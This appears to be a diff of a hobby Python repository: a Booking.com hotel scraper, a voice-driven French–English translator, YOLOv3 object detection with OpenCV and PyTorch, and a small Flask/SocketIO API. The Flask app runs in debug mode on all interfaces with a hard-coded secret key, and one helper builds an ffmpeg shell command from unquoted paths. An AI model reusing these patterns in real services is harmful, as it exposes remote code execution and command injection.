        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9'}
        response = requests.get(url, headers=headers)
        soup = BeautifulSoup(response.content, 'lxml')

        title = [titl.text for titl in soup.find_all('div', attrs={'data-testid': 'title'})]
        city_list = [self.city.capitalize() for vatind in range(len(title))]

        address = [addr.text for addr in soup.find_all('span', attrs={'data-testid': 'address'})]
        price = [float(price.text.replace("£", "").replace(",", "").replace("US$", "")) for price in soup.find_all('span', attrs={'data-testid': 'price-and-discounted-price'})]
        assumed_vat = [f"{assumed_vat_percentage * 100}%" for vatind in range(len(price))]
        checkin = [self.checkin_date for checkin in range(len(title))]
        checkout = [self.checkout_date for checkout in range(len(title))]
        assumed_final_price = [pr * (1 + assumed_vat_percentage) for pr in price]
        booking = [xnights.text for xnights in soup.find_all('div', attrs={'data-testid': 'price-for-x-nights'})]
        room = [recounit.find("div", attrs={'class': 'd8eab2cf7f'}).text for recounit in soup.find_all('div', attrs={'data-testid': 'recommended-units'})]
        location = [recounit.find("a").get("href") for recounit in soup.find_all('div', attrs={'data-testid': 'location'})]

        distance = [dist.text for dist in soup.find_all('span', attrs={'data-testid': 'distance'})]
        reviews = [rev.text for rev in soup.find_all('div', attrs={'class': 'd8eab2cf7f c90c0a70d3 db63693c62'})]
        rating = [float(rate.text) for rate in soup.select("[aria-label]") if rating_regex.match(rate.text) and "." in rate.text]


        for bookingind in range(len(title)):
            booking_info = {}
            try:
                city_json = {'city': city_list[bookingind]}
                booking_info.update(city_json)
            except IndexError as ex:
                pass
            try:
                title_json = {'title': title[bookingind]}
                booking_info.update(title_json)
            except IndexError as ex:
                continue
            try:
                checkin_date_json = {'checkin_date': checkin[bookingind]}
                booking_info.update(checkin_date_json)
            except IndexError as ex:
                pass
            try:
                checkout_date_json = {'checkout_date': checkout[bookingind]}
                booking_info.update(checkout_date_json)
            except IndexError as ex:
                pass
            try:
                address_json = {'address': address[bookingind]}
                booking_info.update(address_json)
            except IndexError as ex:
                pass
            try:
                price_json = {'price': price[bookingind]}
                booking_info.update(price_json)
            except IndexError as ex:
                pass
            try:
                assumed_vat_json = {'assumed_vat': assumed_vat[bookingind]}
                booking_info.update(assumed_vat_json)
            except IndexError as ex:
                pass
            try:
                assumed_final_price_json = {'assumed_final_price': assumed_final_price[bookingind]}
                booking_info.update(assumed_final_price_json)
            except IndexError as ex:
                pass
            try:
                booking_json = {'booking': booking[bookingind]}
                booking_info.update(booking_json)
            except IndexError as ex:
                pass
            try:
                distance_json = {'distance': distance[bookingind]}
                booking_info.update(distance_json)
            except IndexError as ex:
                pass
            try:
                reviews_json = {'reviews': reviews[bookingind]}
                booking_info.update(reviews_json)
            except IndexError as ex:
                pass
            try:
                room_json = {'room': room[bookingind]}
                booking_info.update(room_json)
            except IndexError as ex:
                pass
            try:
                rating_json = {'rating': rating[bookingind]}
                booking_info.update(rating_json)
            except IndexError as ex:
                pass
            try:
                location_json = {'location': location[bookingind]}
                booking_info.update(location_json)
            except IndexError as ex:
                pass
            bookings.append(booking_info)

        return bookings
def store_lower_than_3000(city, range):
    def condition(dic):
        ''' Define your own condition here'''
        try:
            price = dic['assumed_final_price']
            return price <= range
        except KeyError as kex:
            return False
    with open(f"{city.lower()}_bookings.json", "r") as f:
        bookings = json.load(f)[f"{city.lower()}_bookings"]

    filtered = [d for d in bookings if condition(d)]
    with open(f"{city.lower()}_smaller_than_{range}.json", "w+") as f:
        json.dump({f"{city.lower()}_bookings": filtered}, f)
    print(f"less than {range} stored")

def store_whole_booking(city, num_of_pages):
    overall_booking_info = []
    print(f"Extracting hotel data for {city}...")
    for i in tqdm(range(1, num_of_pages + 1)):
        params = {
            "city": city,
            "checkin_date": "2023-8-01",
            "checkout_date": "2023-8-08",
            "purpose": "work",
            "num_of_adults": 10,
            "num_of_rooms": 5,
            "num_of_children": 0,
            "page_num": i
        }
        url = CaesarHotelBooking.create_url(**params)
        bookinginfo = CaesarHotelBooking.caesar_get_hotel_info(url)
        overall_booking_info.append(bookinginfo)
    full_bookings = list(itertools.chain(*overall_booking_info))
    with open(f"{city.lower()}_bookings.json", "w+") as f:
        json.dump({f"{city.lower()}_bookings": full_bookings}, f)
    print(full_bookings)
    print(len(full_bookings))
def main():
    # TODO Check out Expedia...
    try:
        city = sys.argv[1]
        max_amount = float(sys.argv[2])  # 3000
    except IndexError as iex:
        print("python caesarhotelbooking.py <city_to_book> <max_amount>")
        return
    num_of_pages = 10
    store_whole_booking(city, num_of_pages)

    store_lower_than_3000(city, max_amount)

if __name__ == "__main__":
    main()
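A single-page usage sketch for the scraper class above (the parameter values mirror the ones used in store_whole_booking and the Bookings JSON; Booking.com markup changes frequently, so the data-testid selectors may need updating):

```python
from CaesarHotelBooking.caesarhotelbooking import CaesarHotelBooking

# Illustrative: build the search URL for one results page and scrape it.
url = CaesarHotelBooking.create_url(
    city="Alicante",
    num_of_adults=8,
    num_of_rooms=5,
    num_of_children=0,
    checkin_date="2023-8-15",
    checkout_date="2023-8-22",
    purpose="leisure",
    page_num=1,
)
bookings = CaesarHotelBooking.caesar_get_hotel_info(url)
print(len(bookings), "results on page 1")
```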
CaesarLangTranslate/caesarlangtranslate.py
ADDED
@@ -0,0 +1,73 @@
from googletrans import Translator, constants
from pprint import pprint
#import library
import warnings
#from gtts import gTTS
import os

import time
import pyttsx3
warnings.filterwarnings("ignore")
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import speech_recognition as sr
class CaesarLangTranslate:
    def __init__(self) -> None:
        self.translator = Translator()
    @classmethod
    def all_languages(cls):
        print("Total supported languages:", len(constants.LANGUAGES))
        print("Languages:")
        pprint(constants.LANGUAGES)
    def translate(self, text, src="fr", lang="en", verbose=False):
        translation = self.translator.translate(text, src=src, dest=lang)
        print(f"{translation.origin} ({translation.src}) --> {translation.text} ({translation.dest})")
        if verbose == True:
            pprint(translation.extra_data)
        return translation.origin, translation.text, translation.dest

# Initialize recognizer class (for recognizing the speech)
engine = pyttsx3.init('sapi5')
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[1].id)
recognizer = sr.Recognizer()

def speak(text, whisper_mode=None):
    if whisper_mode == 0:
        engine.say(text)
        engine.runAndWait()

def caesar_recognition(language="en-US"):
    r = sr.Recognizer()
    with sr.Microphone() as source:
        recognizer.adjust_for_ambient_noise(source, duration=1)
        audio = r.listen(source)
        said = ""

        try:
            said = r.recognize_google(audio, language=language)
            print(said)
        except Exception as e:
            print("Exception: " + str(e))

    return said.lower()
WAKE = "hello caesar"
while True:
    print("Listening")
    text = caesar_recognition()

    if WAKE in text:
        print("How can I help you sir?")
        speak("How can I help you sir?", 0)
        text = caesar_recognition()
        TRANSLATION_MODE = "translate"
        if TRANSLATION_MODE in text:
            print("What is your translation?")
            speak("What is your translation?", 0)
            text = caesar_recognition(language="fr-FR")
            caesarlangtranslate = CaesarLangTranslate()
            tranlationinfo = caesarlangtranslate.translate(text)
            print(tranlationinfo)
            speak(tranlationinfo[1], 0)
    else:
        print(text)
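Because the module above starts its wake-word loop at import time (and initialises the Windows-only "sapi5" pyttsx3 driver), here is a minimal sketch of the translation step in isolation, assuming googletrans is installed and reachable; the sample phrase is illustrative:

```python
from googletrans import Translator

# Isolated version of CaesarLangTranslate.translate(): French text -> English text.
translator = Translator()
result = translator.translate("bonjour tout le monde", src="fr", dest="en")
print(f"{result.origin} ({result.src}) --> {result.text} ({result.dest})")
```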
CaesarObjectDetection/CaesarYolo.py
ADDED
@@ -0,0 +1,192 @@
import cv2
import numpy as np
import os
import time
import ffmpeg


class CaesarYolo:
    def __init__(self) -> None:
        self.CONFIDENCE = 0.5
        self.SCORE_THRESHOLD = 0.5
        self.IOU_THRESHOLD = 0.5
        self.current_dir = os.path.realpath(__file__).replace(f"/CaesarYolo.py", "")
        config_path = f"{self.current_dir}/cfg/yolov3.cfg"
        weights_path = f"{self.current_dir}/weights/yolov3.weights"
        self.font_scale = 1
        self.thickness = 1
        self.LABELS = open(f"{self.current_dir}/data/coco.names").read().strip().split("\n")
        self.COLORS = np.random.randint(0, 255, size=(len(self.LABELS), 3), dtype="uint8")

        self.net = cv2.dnn.readNetFromDarknet(config_path, weights_path)

        self.ln = self.net.getLayerNames()
        try:
            self.ln = [self.ln[i[0] - 1] for i in self.net.getUnconnectedOutLayers()]
        except IndexError:
            # in case getUnconnectedOutLayers() returns 1D array when CUDA isn't available
            self.ln = [self.ln[i - 1] for i in self.net.getUnconnectedOutLayers()]
    @staticmethod
    def compress_video(video_full_path, output_file_name, target_size):
        # Reference: https://en.wikipedia.org/wiki/Bit_rate#Encoding_bit_rate
        min_audio_bitrate = 32000
        max_audio_bitrate = 256000

        probe = ffmpeg.probe(video_full_path)
        # Video duration, in s.
        duration = float(probe['format']['duration'])
        # Audio bitrate, in bps.
        audio_bitrate = float(next((s for s in probe['streams'] if s['codec_type'] == 'audio'), None)['bit_rate'])
        # Target total bitrate, in bps.
        target_total_bitrate = (target_size * 1024 * 8) / (1.073741824 * duration)

        # Target audio bitrate, in bps
        if 10 * audio_bitrate > target_total_bitrate:
            audio_bitrate = target_total_bitrate / 10
            if audio_bitrate < min_audio_bitrate < target_total_bitrate:
                audio_bitrate = min_audio_bitrate
            elif audio_bitrate > max_audio_bitrate:
                audio_bitrate = max_audio_bitrate
        # Target video bitrate, in bps.
        video_bitrate = target_total_bitrate - audio_bitrate

        i = ffmpeg.input(video_full_path)
        ffmpeg.output(i, os.devnull,
                      **{'c:v': 'libx264', 'b:v': video_bitrate, 'pass': 1, 'f': 'mp4'}
                      ).overwrite_output().run()
        ffmpeg.output(i, output_file_name,
                      **{'c:v': 'libx264', 'b:v': video_bitrate, 'pass': 2, 'c:a': 'aac', 'b:a': audio_bitrate}
                      ).overwrite_output().run()


    def video_load(self, videofile):
        self.video_file = f"{self.current_dir}/{videofile}"
        if self.video_file:
            self.cap = cv2.VideoCapture(self.video_file)
            _, image = self.cap.read()
            h, w = image.shape[:2]
            fourcc = cv2.VideoWriter_fourcc(*"XVID")
            frames = self.cap.get(cv2.CAP_PROP_FRAME_COUNT)
            fps = self.cap.get(cv2.CAP_PROP_FPS)

            # calculate duration of the video
            self.duration_seconds = round(frames / fps)
            self.out = cv2.VideoWriter(f"{self.current_dir}/output.avi", fourcc, 20.0, (w, h))
            self.overall_time_taken = []
    def caesar_object_detect(self, image, verbose=False):
        # compare by value; `is` against a string literal is unreliable
        if self.video_file and isinstance(image, str) and image == "video":
            _, image = self.cap.read()
        try:
            h, w = image.shape[:2]
        except AttributeError as aex:
            return None, None, None
        blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
        self.net.setInput(blob)
        start = time.perf_counter()
        layer_outputs = self.net.forward(self.ln)
        time_took = time.perf_counter() - start
        if verbose == True:
            print("Time took:", time_took)
        if self.video_file:
            self.overall_time_taken.append(time_took)
            time_elapsed = round(sum(self.overall_time_taken), 3)
            approx_finish = self.duration_seconds * 4.6  # seconds
        boxes, confidences, class_ids = [], [], []

        # loop over each of the layer outputs
        for output in layer_outputs:
            # loop over each of the object detections
            for detection in output:
                # extract the class id (label) and confidence (as a probability) of
                # the current object detection
                scores = detection[5:]
                class_id = np.argmax(scores)
                confidence = scores[class_id]
                # discard weak predictions by ensuring the detected
                # probability is greater than the minimum probability
                if confidence > self.CONFIDENCE:
                    # scale the bounding box coordinates back relative to the
                    # size of the image, keeping in mind that YOLO actually
                    # returns the center (x, y)-coordinates of the bounding
                    # box followed by the boxes' width and height
                    box = detection[:4] * np.array([w, h, w, h])
                    (centerX, centerY, width, height) = box.astype("int")

                    # use the center (x, y)-coordinates to derive the top and
                    # and left corner of the bounding box
                    x = int(centerX - (width / 2))
                    y = int(centerY - (height / 2))

                    # update our list of bounding box coordinates, confidences,
                    # and class IDs
                    boxes.append([x, y, int(width), int(height)])
                    confidences.append(float(confidence))
                    class_ids.append(class_id)

        # perform the non maximum suppression given the scores defined before
        idxs = cv2.dnn.NMSBoxes(boxes, confidences, self.SCORE_THRESHOLD, self.IOU_THRESHOLD)

        self.font_scale = 1
        self.thickness = 1

        # ensure at least one detection exists
        if len(idxs) > 0:
            # loop over the indexes we are keeping
            for i in idxs.flatten():
                # extract the bounding box coordinates
                x, y = boxes[i][0], boxes[i][1]
                w, h = boxes[i][2], boxes[i][3]
                # draw a bounding box rectangle and label on the image

                color = [int(c) for c in self.COLORS[class_ids[i]]]
                cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=self.thickness)
                text = f"{self.LABELS[class_ids[i]]}: {confidences[i]:.2f}"
                # calculate text width & height to draw the transparent boxes as background of the text
                (text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=self.font_scale, thickness=self.thickness)[0]
                text_offset_x = x
                text_offset_y = y - 5
                box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))
                overlay = image.copy()
                cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)
                # add opacity (transparency to the box)
                image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)
                # now put the text (label: confidence %)
                cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,
                            fontScale=self.font_scale, color=(0, 0, 0), thickness=self.thickness)
        if self.video_file:
            self.out.write(image)
            return image, time_elapsed, approx_finish
        elif not self.video_file:
            return image, 0, 0

if __name__ == "__main__":
    def test():
        caesaryolo = CaesarYolo()
        caesaryolo.video_load("car-detection.mp4")
        while True:
            image, time_elapsed, end_time = caesaryolo.caesar_object_detect("video")
            if image is not None:
                print(round(time_elapsed, 3), "out of", end_time)
                cv2.imshow("image", image)

                if ord("q") == cv2.waitKey(1):
                    break
            else:
                break


        caesaryolo.cap.release()
        cv2.destroyAllWindows()
    def convert_avi_to_mp4(avi_file_path, output_name):
        os.system(f"ffmpeg -y -i {avi_file_path} {output_name}")
        return True

    CURRENT_DIR = os.path.realpath(__file__).replace(f"/CaesarYolo.py", "")
    #convert_avi_to_mp4(,)
    import subprocess

    #process = subprocess.Popen(ffmpeg_command, stdout = subprocess.PIPE, stderr = subprocess.STDOUT, bufsize = -1)
CaesarObjectDetection/README.md
ADDED
@@ -0,0 +1,20 @@
# [How to Perform YOLO Object Detection using OpenCV and PyTorch in Python](https://www.thepythoncode.com/article/yolo-object-detection-with-opencv-and-pytorch-in-python)
To run this:
- `pip3 install -r requirements.txt`
- Download the [model weights](https://pjreddie.com/media/files/yolov3.weights) and put them in the `weights` folder.
- To generate an object detection image on `images/dog.jpg`:
```
python yolo_opencv.py images/dog.jpg
```
A new image `dog_yolo3.jpg` will appear which has the bounding boxes of the different objects in the image.
- For live object detection:
```
python live_yolo_opencv.py
```
- If you want to read from a video file and make predictions:
```
python read_video.py video.avi
```
This will start detecting objects in that video; in the end, it'll save the resulting video to `output.avi`.
- If you wish to use PyTorch for GPU acceleration, please install PyTorch CUDA [here](https://pytorch.org/get-started) and use the `yolo.py` file.
- Feel free to edit the code for your needs!
CaesarObjectDetection/__pycache__/CaesarYolo.cpython-37.pyc
ADDED
Binary file (5.87 kB)
CaesarObjectDetection/__pycache__/CaesarYolo.cpython-39.pyc
ADDED
Binary file (3.44 kB)
CaesarObjectDetection/app.py
ADDED
@@ -0,0 +1,42 @@
from flask import Flask,request
from flask_cors import cross_origin
from flask_socketio import SocketIO,send,emit
from CaesarYolo import CaesarYolo
import numpy as np
import base64
caesaryolo = CaesarYolo()
app = Flask(__name__)
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app)


@app.route("/",methods=["GET"])
@cross_origin()
def caesaraihome():
    return "Welcome to CaesarAI's API's and CaesarAINL."
@app.route("/caesarobjectdetect",methods=["POST"])
def caesarobjectdetect():
    frames = request.get_json()
    #print(frames)

    image = caesaryolo.caesar_object_detect(np.frombuffer(base64.b64decode(frames["frame"]),dtype="uint8").reshape(480,640,3))#base64.b64decode(frames["frame"]))
    return {'frame': base64.b64encode(image).decode()}

@socketio.on('message')
def message(data):
    print(data) # {'from': 'client'}
    emit('response', {'from': 'server'})

@socketio.on('man')
def message(data):
    print(data) # {'from': 'client'}
    emit('response', {'from': 'server man'})
@socketio.on('caesarobjectdetect')
def caesarobjectdetect(image):
    image = caesaryolo.caesar_object_detect(np.array(image["frame"]))
    emit('caesarobjectresponse', {'frame': str(image)})

if __name__ == "__main__":
    #port = int(os.environ.get('PORT', 5000)) # 80
    app.run(debug=True,host="0.0.0.0",port=5000)
    #socketio.run(app,debug=True,host="0.0.0.0",port=5000)
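For reference, a minimal sketch of a client for the `/caesarobjectdetect` route above, assuming the server runs on localhost:5000 and the frame really is a 480x640x3 uint8 array (the shape the endpoint hard-codes); the full webcam client committed in this change is `sendweb.py` further down, and the output filename here is only illustrative:
```
import base64
import cv2
import numpy as np
import requests

frame = cv2.imread("CaesarObjectDetection/images/dog.jpg")
frame = cv2.resize(frame, (640, 480))               # match the endpoint's reshape(480, 640, 3)
payload = {"frame": base64.b64encode(frame.tobytes()).decode()}
resp = requests.post("http://127.0.0.1:5000/caesarobjectdetect", json=payload)
out = np.frombuffer(base64.b64decode(resp.json()["frame"]), dtype="uint8").reshape(480, 640, 3)
cv2.imwrite("dog_detected.jpg", out)                # hypothetical output path
```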
CaesarObjectDetection/cfg/yolov3.cfg
ADDED
@@ -0,0 +1,3 @@
version https://git-lfs.github.com/spec/v1
oid sha256:39498ec1475dbe57b0308c272d0ce8bd4f3434f70b4a06f59e8a5d6194afdfc6
size 8342
CaesarObjectDetection/darknet.py
ADDED
@@ -0,0 +1,463 @@
import torch
import torch.nn as nn
import numpy as np

# let us run this cell only if CUDA is available
# We will use ``torch.device`` objects to move tensors in and out of GPU
if torch.cuda.is_available():
    x = torch.randn(1)
    device = torch.device("cuda")          # a CUDA device object
    y = torch.ones_like(x, device=device)  # directly create a tensor on GPU
    x = x.to(device)                       # or just use strings ``.to("cuda")``
    z = x + y
    print(z)
    print(z.to("cpu", torch.double))       # ``.to`` can also change dtype together!


class YoloLayer(nn.Module):
    def __init__(self, anchor_mask=[], num_classes=0, anchors=[], num_anchors=1):
        super(YoloLayer, self).__init__()
        self.anchor_mask = anchor_mask
        self.num_classes = num_classes
        self.anchors = anchors
        self.num_anchors = num_anchors
        self.anchor_step = len(anchors)/num_anchors
        self.coord_scale = 1
        self.noobject_scale = 1
        self.object_scale = 5
        self.class_scale = 1
        self.thresh = 0.6
        self.stride = 32
        self.seen = 0

    def forward(self, output, nms_thresh):
        self.thresh = nms_thresh
        masked_anchors = []

        for m in self.anchor_mask:
            masked_anchors += self.anchors[m*self.anchor_step:(m+1)*self.anchor_step]

        masked_anchors = [anchor/self.stride for anchor in masked_anchors]
        boxes = get_region_boxes(output.data, self.thresh, self.num_classes, masked_anchors, len(self.anchor_mask))

        return boxes


class Upsample(nn.Module):
    def __init__(self, stride=2):
        super(Upsample, self).__init__()
        self.stride = stride
    def forward(self, x):
        stride = self.stride
        assert(x.data.dim() == 4)
        B = x.data.size(0)
        C = x.data.size(1)
        H = x.data.size(2)
        W = x.data.size(3)
        ws = stride
        hs = stride
        x = x.view(B, C, H, 1, W, 1).expand(B, C, H, stride, W, stride).contiguous().view(B, C, H*stride, W*stride)
        return x


#for route and shortcut
class EmptyModule(nn.Module):
    def __init__(self):
        super(EmptyModule, self).__init__()

    def forward(self, x):
        return x

# support route shortcut
class Darknet(nn.Module):
    def __init__(self, cfgfile):
        super(Darknet, self).__init__()
        self.blocks = parse_cfg(cfgfile)
        self.models = self.create_network(self.blocks) # merge conv, bn,leaky
        self.loss = self.models[len(self.models)-1]

        self.width = int(self.blocks[0]['width'])
        self.height = int(self.blocks[0]['height'])

        self.header = torch.IntTensor([0,0,0,0])
        self.seen = 0

    def forward(self, x, nms_thresh):
        ind = -2
        self.loss = None
        outputs = dict()
        out_boxes = []

        for block in self.blocks:
            ind = ind + 1
            if block['type'] == 'net':
                continue
            elif block['type'] in ['convolutional', 'upsample']:
                x = self.models[ind](x)
                outputs[ind] = x
            elif block['type'] == 'route':
                layers = block['layers'].split(',')
                layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
                if len(layers) == 1:
                    x = outputs[layers[0]]
                    outputs[ind] = x
                elif len(layers) == 2:
                    x1 = outputs[layers[0]]
                    x2 = outputs[layers[1]]
                    x = torch.cat((x1,x2),1)
                    outputs[ind] = x
            elif block['type'] == 'shortcut':
                from_layer = int(block['from'])
                activation = block['activation']
                from_layer = from_layer if from_layer > 0 else from_layer + ind
                x1 = outputs[from_layer]
                x2 = outputs[ind-1]
                x = x1 + x2
                outputs[ind] = x
            elif block['type'] == 'yolo':
                boxes = self.models[ind](x, nms_thresh)
                out_boxes.append(boxes)
            else:
                print('unknown type %s' % (block['type']))

        return out_boxes


    def print_network(self):
        print_cfg(self.blocks)

    def create_network(self, blocks):
        models = nn.ModuleList()

        prev_filters = 3
        out_filters =[]
        prev_stride = 1
        out_strides = []
        conv_id = 0
        for block in blocks:
            if block['type'] == 'net':
                prev_filters = int(block['channels'])
                continue
            elif block['type'] == 'convolutional':
                conv_id = conv_id + 1
                batch_normalize = int(block['batch_normalize'])
                filters = int(block['filters'])
                kernel_size = int(block['size'])
                stride = int(block['stride'])
                is_pad = int(block['pad'])
                pad = (kernel_size-1)//2 if is_pad else 0
                activation = block['activation']
                model = nn.Sequential()
                if batch_normalize:
                    model.add_module('conv{0}'.format(conv_id), nn.Conv2d(prev_filters, filters, kernel_size, stride, pad, bias=False))
                    model.add_module('bn{0}'.format(conv_id), nn.BatchNorm2d(filters))
                else:
                    model.add_module('conv{0}'.format(conv_id), nn.Conv2d(prev_filters, filters, kernel_size, stride, pad))
                if activation == 'leaky':
                    model.add_module('leaky{0}'.format(conv_id), nn.LeakyReLU(0.1, inplace=True))
                prev_filters = filters
                out_filters.append(prev_filters)
                prev_stride = stride * prev_stride
                out_strides.append(prev_stride)
                models.append(model)
            elif block['type'] == 'upsample':
                stride = int(block['stride'])
                out_filters.append(prev_filters)
                prev_stride = prev_stride // stride
                out_strides.append(prev_stride)
                models.append(Upsample(stride))
            elif block['type'] == 'route':
                layers = block['layers'].split(',')
                ind = len(models)
                layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
                if len(layers) == 1:
                    prev_filters = out_filters[layers[0]]
                    prev_stride = out_strides[layers[0]]
                elif len(layers) == 2:
                    assert(layers[0] == ind - 1)
                    prev_filters = out_filters[layers[0]] + out_filters[layers[1]]
                    prev_stride = out_strides[layers[0]]
                out_filters.append(prev_filters)
                out_strides.append(prev_stride)
                models.append(EmptyModule())
            elif block['type'] == 'shortcut':
                ind = len(models)
                prev_filters = out_filters[ind-1]
                out_filters.append(prev_filters)
                prev_stride = out_strides[ind-1]
                out_strides.append(prev_stride)
                models.append(EmptyModule())
            elif block['type'] == 'yolo':
                yolo_layer = YoloLayer()
                anchors = block['anchors'].split(',')
                anchor_mask = block['mask'].split(',')
                yolo_layer.anchor_mask = [int(i) for i in anchor_mask]
                yolo_layer.anchors = [float(i) for i in anchors]
                yolo_layer.num_classes = int(block['classes'])
                yolo_layer.num_anchors = int(block['num'])
                yolo_layer.anchor_step = len(yolo_layer.anchors)//yolo_layer.num_anchors
                yolo_layer.stride = prev_stride
                out_filters.append(prev_filters)
                out_strides.append(prev_stride)
                models.append(yolo_layer)
            else:
                print('unknown type %s' % (block['type']))

        return models

    def load_weights(self, weightfile):
        print()
        fp = open(weightfile, 'rb')
        header = np.fromfile(fp, count=5, dtype=np.int32)
        self.header = torch.from_numpy(header)
        self.seen = self.header[3]
        buf = np.fromfile(fp, dtype = np.float32)
        fp.close()

        start = 0
        ind = -2
        counter = 3
        for block in self.blocks:
            if start >= buf.size:
                break
            ind = ind + 1
            if block['type'] == 'net':
                continue
            elif block['type'] == 'convolutional':
                model = self.models[ind]
                batch_normalize = int(block['batch_normalize'])
                if batch_normalize:
                    start = load_conv_bn(buf, start, model[0], model[1])
                else:
                    start = load_conv(buf, start, model[0])
            elif block['type'] == 'upsample':
                pass
            elif block['type'] == 'route':
                pass
            elif block['type'] == 'shortcut':
                pass
            elif block['type'] == 'yolo':
                pass
            else:
                print('unknown type %s' % (block['type']))

            percent_comp = (counter / len(self.blocks)) * 100

            print('Loading weights. Please Wait...{:.2f}% Complete'.format(percent_comp), end = '\r', flush = True)

            counter += 1


def convert2cpu(gpu_matrix):
    return torch.FloatTensor(gpu_matrix.size()).copy_(gpu_matrix)


def convert2cpu_long(gpu_matrix):
    return torch.LongTensor(gpu_matrix.size()).copy_(gpu_matrix)


def get_region_boxes(output, conf_thresh, num_classes, anchors, num_anchors, only_objectness = 1, validation = False):
    anchor_step = len(anchors)//num_anchors
    if output.dim() == 3:
        output = output.unsqueeze(0)
    batch = output.size(0)
    assert(output.size(1) == (5+num_classes)*num_anchors)
    h = output.size(2)
    w = output.size(3)

    all_boxes = []
    output = output.view(batch*num_anchors, 5+num_classes, h*w).transpose(0,1).contiguous().view(5+num_classes, batch*num_anchors*h*w)

    grid_x = torch.linspace(0, w-1, w).repeat(h,1).repeat(batch*num_anchors, 1, 1).view(batch*num_anchors*h*w).type_as(output) #cuda()
    grid_y = torch.linspace(0, h-1, h).repeat(w,1).t().repeat(batch*num_anchors, 1, 1).view(batch*num_anchors*h*w).type_as(output) #cuda()
    xs = torch.sigmoid(output[0]) + grid_x
    ys = torch.sigmoid(output[1]) + grid_y

    anchor_w = torch.Tensor(anchors).view(num_anchors, anchor_step).index_select(1, torch.LongTensor([0]))
    anchor_h = torch.Tensor(anchors).view(num_anchors, anchor_step).index_select(1, torch.LongTensor([1]))
    anchor_w = anchor_w.repeat(batch, 1).repeat(1, 1, h*w).view(batch*num_anchors*h*w).type_as(output) #cuda()
    anchor_h = anchor_h.repeat(batch, 1).repeat(1, 1, h*w).view(batch*num_anchors*h*w).type_as(output) #cuda()
    ws = torch.exp(output[2]) * anchor_w
    hs = torch.exp(output[3]) * anchor_h

    det_confs = torch.sigmoid(output[4])
    cls_confs = torch.nn.Softmax(dim=1)(output[5:5+num_classes].transpose(0,1)).detach()
    cls_max_confs, cls_max_ids = torch.max(cls_confs, 1)
    cls_max_confs = cls_max_confs.view(-1)
    cls_max_ids = cls_max_ids.view(-1)


    sz_hw = h*w
    sz_hwa = sz_hw*num_anchors
    det_confs = convert2cpu(det_confs)
    cls_max_confs = convert2cpu(cls_max_confs)
    cls_max_ids = convert2cpu_long(cls_max_ids)
    xs = convert2cpu(xs)
    ys = convert2cpu(ys)
    ws = convert2cpu(ws)
    hs = convert2cpu(hs)
    if validation:
        cls_confs = convert2cpu(cls_confs.view(-1, num_classes))

    for b in range(batch):
        boxes = []
        for cy in range(h):
            for cx in range(w):
                for i in range(num_anchors):
                    ind = b*sz_hwa + i*sz_hw + cy*w + cx
                    det_conf = det_confs[ind]
                    if only_objectness:
                        conf = det_confs[ind]
                    else:
                        conf = det_confs[ind] * cls_max_confs[ind]

                    if conf > conf_thresh:
                        bcx = xs[ind]
                        bcy = ys[ind]
                        bw = ws[ind]
                        bh = hs[ind]
                        cls_max_conf = cls_max_confs[ind]
                        cls_max_id = cls_max_ids[ind]
                        box = [bcx/w, bcy/h, bw/w, bh/h, det_conf, cls_max_conf, cls_max_id]
                        if (not only_objectness) and validation:
                            for c in range(num_classes):
                                tmp_conf = cls_confs[ind][c]
                                if c != cls_max_id and det_confs[ind]*tmp_conf > conf_thresh:
                                    box.append(tmp_conf)
                                    box.append(c)
                        boxes.append(box)
        all_boxes.append(boxes)

    return all_boxes


def parse_cfg(cfgfile):
    blocks = []
    fp = open(cfgfile, 'r')
    block = None
    line = fp.readline()
    while line != '':
        line = line.rstrip()
        if line == '' or line[0] == '#':
            line = fp.readline()
            continue
        elif line[0] == '[':
            if block:
                blocks.append(block)
            block = dict()
            block['type'] = line.lstrip('[').rstrip(']')
            # set default value
            if block['type'] == 'convolutional':
                block['batch_normalize'] = 0
        else:
            key,value = line.split('=')
            key = key.strip()
            if key == 'type':
                key = '_type'
            value = value.strip()
            block[key] = value
        line = fp.readline()

    if block:
        blocks.append(block)
    fp.close()
    return blocks


def print_cfg(blocks):
    print('layer filters size input output')
    prev_width = 416
    prev_height = 416
    prev_filters = 3
    out_filters =[]
    out_widths =[]
    out_heights =[]
    ind = -2
    for block in blocks:
        ind = ind + 1
        if block['type'] == 'net':
            prev_width = int(block['width'])
            prev_height = int(block['height'])
            continue
        elif block['type'] == 'convolutional':
            filters = int(block['filters'])
            kernel_size = int(block['size'])
            stride = int(block['stride'])
            is_pad = int(block['pad'])
            pad = (kernel_size-1)//2 if is_pad else 0
            width = (prev_width + 2*pad - kernel_size)//stride + 1
            height = (prev_height + 2*pad - kernel_size)//stride + 1
            print('%5d %-6s %4d %d x %d / %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'conv', filters, kernel_size, kernel_size, stride, prev_width, prev_height, prev_filters, width, height, filters))
            prev_width = width
            prev_height = height
            prev_filters = filters
            out_widths.append(prev_width)
            out_heights.append(prev_height)
            out_filters.append(prev_filters)
        elif block['type'] == 'upsample':
            stride = int(block['stride'])
            filters = prev_filters
            width = prev_width*stride
            height = prev_height*stride
            print('%5d %-6s * %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'upsample', stride, prev_width, prev_height, prev_filters, width, height, filters))
            prev_width = width
            prev_height = height
            prev_filters = filters
            out_widths.append(prev_width)
            out_heights.append(prev_height)
            out_filters.append(prev_filters)
        elif block['type'] == 'route':
            layers = block['layers'].split(',')
            layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
            if len(layers) == 1:
                print('%5d %-6s %d' % (ind, 'route', layers[0]))
